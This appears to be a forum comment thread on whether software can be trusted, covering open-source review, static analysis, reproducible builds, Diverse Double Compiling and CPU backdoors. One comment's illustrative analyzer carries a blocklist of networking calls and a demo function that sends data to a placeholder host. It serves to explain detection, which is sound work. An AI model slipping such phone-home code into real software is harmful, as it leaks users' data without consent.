
But, at some point there must be trust. If you don't trust software, you can try to sandbox it, but now you have to trust the sandbox. This devolves into an infinite regress very rapidly. Open source at least provides a facsimile of recourse - just go read the code - but how much of your currently-running open-source code have you actually read? For that matter, if you had, could you be confident that you'd understood it? The Underhanded C Contest is a thing, after all. A sufficiently paranoid individual can only run code they wrote themselves. Or they can choose to run code without a strong understanding of what it's doing.

If Apple subverts their updates, that's mostly interesting as a signal of their trustworthiness moving forwards. The coolest thing about this is that we know it's happening at all, I think.




> Open source at least provides a facsimile of recourse - just go read the code - but how much of your currently-running open-source code have you actually read?

Wait, what? That is not the recourse that open source provides.

The great thing about open source is that you don't need every person to read the code, just one person who can either catch user-abusive material or verify its absence.

Moreover, even if zero people read the code today, it is preserved so that state (or corporate) abuse can be revealed later, providing another disincentive to introduce abusive material.


Alright, but now you trust that person. Which might be fine, but as an exercise in paranoia it is not the greatest answer. As social proof it is somewhat better - create the opportunity for many people to examine the code, and at least some of them will find things and talk about them. Now the trust rests in the general mass of reviewers - trust that it contains people who will review the code and reveal their findings.


> Alright, but now you trust that person.

In a word: no. With open source code, you could use software authored by the NSA, like SELinux, or you could even hire a manifestly untrustworthy party like Hacking Team to author some code and still be able to trust the code.

In Apple's case, there is a fairly good reason to trust Apple, because it would be a hell of a kabuki theatre production to have the FBI and Apple battle it out in court while colluding in secret. But would you trust a defense contractor? A telco? Limit, or ideally eliminate, the need for trust. Fortunately it is possible to reduce the need for trust below the level of having to trust particular groups or individuals.


Isn't that discredited by Apple's "goto fail" bug? A critical check was mistakenly bypassed in an extremely transparent way, and yet the source code sat on their website for a long time without anybody noticing. Nobody even ran Coverity on it.


goto fail was in OpenSSL which many organizations use, but your point still stands.


No, this was a bug in SecureTransport, Apple's custom TLS implementation.


Oops. You're right. Sorry.


It's not just reading the code -- static analysis tools can provide some guarantees that the software isn't exfiltrating information from your box, making unsolicited connections, or leaving unexpected ports open.

In theory, we can perform the same analysis on the compiled program's bytecode. As the decompilation ecosystem gets better, we may view machine code or bytecode as transparently as source code.
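For a toy illustration of the idea (nothing like a real analyzer - the function names below are made up for the example, and Python's dis module stands in for a proper disassembler):

    import dis
    import urllib.request

    def networking_names(func, blocklist=("socket", "urlopen", "connect", "sendall")):
        # Toy static check: walk the function's bytecode and collect any names
        # that look like networking calls, without ever executing the function.
        names = {ins.argval for ins in dis.get_instructions(func)
                 if ins.opname in ("LOAD_GLOBAL", "LOAD_ATTR", "LOAD_METHOD")}
        return sorted(n for n in names if isinstance(n, str) and n in blocklist)

    def sort_and_phone_home(items):
        result = sorted(items)
        # the kind of exfiltration step the scan should flag
        urllib.request.urlopen("http://example.invalid/?d=" + str(result))
        return result

    print(networking_names(sort_and_phone_home))   # ['urlopen']

A real tool works on machine code or an intermediate representation rather than names, but the principle - inspect, don't execute - is the same.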

Of course, your Apple EULA may bind you against decompiling the machine code -- but it can be argued that you're not 'reverse engineering', you're just doing a virus scan.


Static analysis tools are very useful for identifying accidental security defects; however, they really don't guarantee the absence of a deliberate security flaw or back door. You have to assume that the attacker has access to the same static analysis tools, and can thus find tricky ways to cause false negative scan results. Or perhaps the static analysis tool itself has been compromised?


All fair points -- nothing is guaranteed, but sooner or later you have to trust your tools. Like, maybe there's a backdoor in your compiler so that certain lines of code are compiled to notify Chairman Mao when you shop for red notebooks...

The reproducible builds projects go a long way towards preventing this by producing identical bytes from different compilation chains. Ultimately it's good to have a combination of static analysis, multiple toolchains, and 'many eyes' providing checks and balances for each other.


How do you know you are running the same software that everybody else is reviewing?


One solution is reproducible builds and signatures.

The bitcoin community, for example, uses Gitian to reproducibly build bitcoind. Both Bitcoin Core and Bitcoin Classic host repositories with signed hashes for the output of those builds:

https://github.com/bitcoin/gitian.sigs

https://github.com/bitcoinclassic/gitian.sigs

(As I understand it, several Altcoins do the same as well)

Anybody can follow the published guides for how to perform such a build and compare their results with the published ones. Because the published hashes are signed, you have a reasonable degree of certainty that a variety of people are involved in the process, which also gives you greater confidence in the quality of the binary releases even if you don't want to compile it yourself (and, if you do compile it, you're free to add to the consensus that the binary build is good by PRing your own results).
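The final comparison step is trivial on top of any hashing tool; here's a rough Python sketch (the file name and the expected digest are placeholders - in practice the digest comes from an assert file whose GPG signature you've already verified):

    import hashlib

    def sha256_of(path, chunk_size=1 << 20):
        # Hash the file in chunks so large binaries don't have to fit in memory.
        h = hashlib.sha256()
        with open(path, "rb") as f:
            while True:
                chunk = f.read(chunk_size)
                if not chunk:
                    break
                h.update(chunk)
        return h.hexdigest()

    expected = "placeholder: digest copied from the signed assert file"
    actual = sha256_of("bitcoind")   # placeholder: path to your own build output

    print("OK" if actual == expected else "MISMATCH - do not trust this binary")

The trust property comes from many independent people publishing signed copies of the same digest, not from the hashing itself.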


Please see the Reproducible Builds project, a vital contribution to answering this question.

https://reproducible-builds.org/


Reproducible builds alone don't cut it. If you had a known-good binary signature, you'd also have a known-good source signature, and wouldn't have the problem in the first place.

Or, to put it better: where do you get the certificate to check your build against? At extreme paranoia levels, you simply can never be sure you have the same software as everybody else, so the only safe alternative is reviewing your own copy yourself.

(How do you know the computer is showing you the correct contents of your files? I haven't thought that one through well enough yet.)


Diverse Double Compiling is a proven solution to the "Trusting Trust" problem [0]. So, if a package maintainer signs a package and posts that signature on an HTTPS page, I can have a high level of confidence that the software I compile and run on my machine is identical to what the maintainer released.
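Roughly, the check looks like this (a sketch only, assuming a deterministic, single-file build so the compile command fits on one line; real DDC as Wheeler describes it has more moving parts, and all paths here are hypothetical):

    import subprocess

    def build(source, with_compiler, output):
        # Build the compiler-under-test's source using some other compiler binary.
        subprocess.run([with_compiler, source, "-o", output], check=True)
        return output

    def ddc_check(compiler_source, binary_under_test, trusted_compiler):
        # Stage 1: compile the source with an independent, trusted compiler.
        stage1 = build(compiler_source, trusted_compiler, "stage1")
        # Stage 2: use the stage-1 result to compile the same source again.
        stage2 = build(compiler_source, "./" + stage1, "stage2")
        # If compilation is deterministic, stage2 should be bit-identical to the
        # binary under test; a mismatch means the binary doesn't correspond to
        # the source it claims to come from.
        with open(stage2, "rb") as a, open(binary_under_test, "rb") as b:
            return a.read() == b.read()

    # Hypothetical invocation:
    # ddc_check("mycc.c", "/usr/local/bin/mycc", "/usr/bin/gcc")

The "diverse" part is that the trusted compiler comes from a completely different lineage, so both toolchains would have to carry the same hidden payload for the check to pass.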

Here is some advice from Schneier on running secure software against a state-level adversary [1][2]. However, even that is not immune from a black bag job [3].

[0] http://www.dwheeler.com/trusting-trust/

[1] https://www.schneier.com/blog/archives/2013/10/air_gaps.html

[2] https://www.schneier.com/blog/archives/2014/04/tails.html

[3] https://en.wikipedia.org/wiki/Black_bag_operation


Surely you aren't suggesting that a reasonable answer is to read the code yourself and compare it to a known version?

Obviously, the mainstream way is hash-based file verification.

Which, again, not everybody needs to do - only a small number - in order to catch a bad actor in the act.

But I presume you are trying to make some bigger point. What is that?


It's not reasonable at all. But the only correct answer is reviewing the code yourself.


In Debian, with reproducible builds.


> But, at some point there must be trust.

Do you trust the developers? Okay.

Do you trust the developers, their infrastructure, AND the supply chain? Maybe a bitter pill to swallow.

Recommended reading: https://defuse.ca/triangle-of-secure-code-delivery.htm


If you trust the hardware, that is easier than it sounds. You just have to review the core software and the sandboxing software - then you sandbox the rest.

The reason people mostly don't bother is that they can't also trust the hardware (in fact, our software is often more trustworthy than our hardware). Thus, the point is moot.


> A sufficiently paranoid individual can only run code they wrote themselves.

I'd say that is not sufficient, because even in this case you are trusting someone: the manufacturer of the CPU on which the code runs.

It might surprise some people, but you can examine a piece of software to check whether it has a backdoor, even if it is closed source, by reading the disassembly. Certainly it requires some skill and is a bit time-consuming, but it's doable for an ordinary individual. Reverse engineering software is not as difficult as many think. And as a matter of fact, a large number of people are reading the disassembly of widely-used software to find vulnerabilities to sell on black markets. So I think it's unlikely for Windows or iOS to have maliciously planted backdoors.

On the other hand, it's tremendously difficult for an individual without a large budget to reverse engineer hardware, especially CPUs. So if I were them I'd choose the CPU as the place to put a backdoor, because virtually nobody reverse engineers a modern CPU and thus it'd be very unlikely to be found.

By the way, contemporary CPUs can update themselves through microcode updates.


> But, at some point there must be trust.

We may want to reach a point where we trust the things we use, but if we're using a security-grade definition of trust and we're honest with ourselves, I think every one of us would admit that we're using things that we do not trust. There just isn't enough time to properly review, test, and verify everything.


Generally speaking, I trust Apple hardware. If I have adversaries powerful enough that they can convince Tim Cook to manufacture a crooked device and make sure that I get it when I buy my phone - you can write me off as dead anyway.

I don't trust Apple's iOS software (unlike their OS X software), because I am not in a position to choose whether I trust them or not. The device decides.


Trust isn't binary, and verification doesn't have to be done by each individual - community or ecosystem verification works too.

If 3rd parties can audit software (including analysis of binary-only software), and can observe the software's behavior, and can watch the software's network traffic, then the chance of being caught violating user trust will generally be high enough to make the liability of being caught a genuine concern.

However, if updates are automatic, encrypted, and platform DRM prevents 3rd-party audit/analysis, the chance of being caught starts to dwindle down towards zero. That entire trust ecosystem disappears, and what we're left with is absolute trust in a corruptible third party, and no mechanism with which to verify.

The latter is exactly what Apple has built. They have a backdoor: the means to push absolutely trusted software while preventing all third-party audit and analysis.


At least for some problems, you need very little trust. For example, you don't have to trust software for sorting your stuff, because checking that something is correctly sorted is very easy. There is an entire field of algorithms that produce answers that are easy to check; it's called certifying algorithms.
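For the sorting case, the checker is a few lines (a minimal sketch; the built-in sorted() just stands in for whatever untrusted black box produced the result):

    from collections import Counter

    def certify_sort(original, claimed):
        # The claimed output must be in non-decreasing order...
        in_order = all(a <= b for a, b in zip(claimed, claimed[1:]))
        # ...and must contain exactly the same items as the input.
        is_permutation = Counter(original) == Counter(claimed)
        return in_order and is_permutation

    data = [3, 1, 2, 2]
    result = sorted(data)              # stand-in for an untrusted sorting routine
    print(certify_sort(data, result))  # True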

Unfortunately that doesn't really work if you have to trust your software _not_ to do tasks that you don't want done, like sending your personal stuff to a third party.


Even there, you have to verify that it doesn't have side effects beyond sorting (like phoning your data home), and that the mechanisms enforcing any sandboxing meant to stop this actually work, etc.


> can only run code they wrote themselves

They of course can't use compilers either [1] and have to write the machine code by hand. And if you consider the CPU's microcode - which can be updated - to be code as well, what are they to do then?

So I agree, you need trust, and the fewer parties you need to trust, the less chance of getting bitten.

[1]: http://c2.com/cgi/wiki?TheKenThompsonHack



